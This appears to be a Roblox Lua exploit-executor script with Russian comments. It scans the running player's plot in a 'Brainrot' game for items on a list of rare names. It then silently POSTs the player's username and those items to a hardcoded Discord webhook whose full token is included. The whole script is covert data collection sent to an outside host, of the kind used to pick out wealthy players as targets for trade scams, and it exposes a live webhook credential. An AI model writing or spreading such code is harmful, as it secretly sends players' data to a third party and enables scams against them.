local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local HttpService = game:GetService("HttpService")

local localPlayer = Players.LocalPlayer

-- Список названий Brainrots, которые нужно отправлять
local allowedBrainrots = {
    "Los Tralaleritos",
    "Garamararam",
    "Vacca Saturno Saturnita",
    "Blueberrinni Octopussini",
    "67",
    "Pot Hotspot",
    "Dragon Cannelloni",
    "Brri Brri Dicus Bombicus",
    "Crazylone Pizalone"
}

-- === Поиск своего плота ===
local function findPlayerPlot()
    local plots = Workspace:FindFirstChild("Plots")
    if not plots then return nil end

    for _, plot in ipairs(plots:GetChildren()) do
        if plot:FindFirstChild("PlayerSign") and plot.PlayerSign:FindFirstChild("BillboardGui") then
            local label = plot.PlayerSign.BillboardGui:FindFirstChild("TextLabel")
            if label and label.Text == localPlayer.DisplayName then
                return plot
            end
        end
    end
    return nil
end

-- === Сбор Brainrots по фильтру ===
local function collectBrainrots(plot)
    local brainrotsText = ""
    local container = plot:FindFirstChild("Brainrots")
    if not container then
        return "❌ Нет Brainrots"
    end

    for i = 1, 17 do
        local node = container:FindFirstChild(tostring(i))
        if node and node:FindFirstChild("Brainrot") then
            local br = node.Brainrot
            local ui = br:FindFirstChild("PlatformUI")
            if ui and ui:FindFirstChild("Title") then
                local text = ui.Title.Text
                if text and text ~= "" then
                    -- проверяем, есть ли текст в списке allowedBrainrots (частичное совпадение)
                    for _, allowed in ipairs(allowedBrainrots) do
                        if string.find(text, allowed) then
                            brainrotsText = brainrotsText .. ("Brainrot %d: %s\n"):format(i, text)
                            break
                        end
                    end
                end
            end
        end
    end

    if brainrotsText == "" then
        brainrotsText = "⚠️ Пусто"
    end
    return brainrotsText
end

-- === Основной запуск ===
local plot = findPlayerPlot()
local brainrots = plot and collectBrainrots(plot) or "❌ Plot не найден"

-- === Отправка в Discord ===
request({
    Url = "https://discord.com/api/webhooks/1417846130619977738/mgmCuOeNpaNOBQddZUtCPaeheSjaBWdLNLfPPg2xk6-533OjiGgbjxwmkKPsQO7TK9ep",
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json"
    },
    Body = HttpService:JSONEncode({
        ["embeds"] = {{
            ["title"] = "**Filtered Brainrots Report**",
            ["color"] = 65280,
            ["fields"] = {
                {
                    ["name"] = "👤 Username",
                    ["value"] = localPlayer.Name,
                    ["inline"] = false
                },
                {
                    ["name"] = "🪐 Brainrots",
                    ["value"] = brainrots,
                    ["inline"] = false
                }
            }
        }}
    })
})
